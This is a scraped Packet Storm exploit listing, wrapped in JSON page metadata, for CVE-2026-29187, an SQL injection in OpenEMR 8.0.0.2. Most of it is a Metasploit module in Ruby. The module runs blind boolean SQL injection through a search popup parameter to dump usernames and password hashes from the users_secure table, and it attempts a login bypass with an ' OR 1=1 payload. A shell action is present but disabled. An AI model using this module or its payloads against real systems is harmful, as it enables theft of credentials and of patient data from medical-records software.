{“lastseen”:”2026-04-20T15:53:52″,”description”:”This Metasploit auxiliary module targets a potential SQL injection vulnerability in OpenEMR version 8.0.0.2…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenEMR 8.0.0.2 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219182″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-29187″],”sourceData”:”==================================================================================================================================\\n | # Title : OpenEMR 8.0.0.2 Exploitation Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.open-emr.org\/wiki\/index.php\/OpenEMR_Downloads |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module targets a potential SQL Injection vulnerability in an OpenEMR installation (CVE-2026-29187). \\n It is designed for controlled security assessment and supports multiple exploitation and enumeration actions.\\n \\n [+] POC : \\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Scanner\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘OpenEMR CVE-2026-29187 SQL Injection Exploit ‘,\\n ‘Description’ =\\u003e ‘OpenEMR 8.0.0.2 Exploitation Tool’,\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [[‘CVE’, ‘2026-29187’]]\\n ))\\n \\n register_options([\\n Opt::RPORT(443),\\n OptBool.new(‘SSL’, [true, ‘SSL’, true]),\\n OptString.new(‘TARGETURI’, [true, ‘Path’, ‘\/openemr\/’]),\\n OptInt.new(‘TIMEOUT’, [true, ‘Timeout’, 10]),\\n OptEnum.new(‘ACTION’, [\\n true,\\n ‘Action’,\\n ‘DUMP_USERS’,\\n ‘DUMP_SCHEMA’,\\n ‘AUTH_BYPASS’,\\n ‘GET_SHELL’\\n ])\\n ])\\n \\n @results = []\\n end\\n \\n def uri(path)\\n normalize_uri(datastore[‘TARGETURI’], path)\\n end\\n \\n def inject_sql(payload)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e uri(‘interface\/new\/new_search_popup.php’),\\n ‘vars_get’ =\\u003e { \\”mf_(#{payload})\\” =\\u003e ‘1’ },\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n })\\n \\n return false unless res\\n res.body.to_s.include?(‘SQL’) || res.body.to_s.include?(‘error’)\\n rescue\\n false\\n end\\n \\n def extract_data(query)\\n result = \\”\\”\\n \\n (1..50).each do |i|\\n (32..126).each do |c|\\n payload = \\”(SELECT IF(ASCII(SUBSTRING((#{query}),#{i},1))=#{c},’1′,’0′))\\”\\n \\n if inject_sql(payload)\\n result \\u003c\\u003c c.chr\\n break\\n end\\n end\\n end\\n \\n result.empty? ? nil : result\\n end\\n \\n def run\\n print_status(\\”Starting OpenEMR SQLi module on #{rhost}\\”)\\n \\n case datastore[‘ACTION’]\\n when ‘DUMP_USERS’\\n dump_users\\n when ‘DUMP_SCHEMA’\\n dump_schema\\n when ‘AUTH_BYPASS’\\n auth_bypass\\n when ‘GET_SHELL’\\n get_shell\\n end\\n end\\n \\n def dump_users\\n print_status(\\”Dumping users…\\”)\\n \\n count = extract_data(\\”SELECT COUNT(*) FROM users_secure\\”).to_i\\n return print_error(\\”No users found\\”) if count \\u003c= 0\\n \\n (0…count).each do |i|\\n user = extract_data(\\”SELECT username FROM users_secure LIMIT #{i},1\\”)\\n pass = extract_data(\\”SELECT password FROM users_secure LIMIT #{i},1\\”)\\n \\n print_good(\\”USER: #{user} PASS: #{pass}\\”)\\n end\\n end\\n \\n def auth_bypass\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e uri(‘interface\/main\/main_screen.php’),\\n ‘vars_post’ =\\u003e {\\n ‘authUser’ =\\u003e \\”‘ OR 1=1 –\\”,\\n ‘clearPass’ =\\u003e ‘x’\\n }\\n })\\n \\n if res \\u0026\\u0026 (res.code == 302 || res.body.to_s !~ \/login\/i)\\n print_good(\\”Auth bypass success\\”)\\n else\\n print_error(\\”Failed\\”)\\n end\\n end\\n \\n def get_shell\\n print_status(\\”Shell method not safe in fixed version (disabled)\\”)\\n end\\n \\n end\\n \\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219182″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219182\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-20T15:53:52″,”description”:”This Metasploit auxiliary module targets a potential SQL injection vulnerability in OpenEMR version 8.0.0.2…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenEMR 8.0.0.2 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219182″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-29187″],”sourceData”:”==================================================================================================================================\\n | # Title : OpenEMR 8.0.0.2 Exploitation…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-48076","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n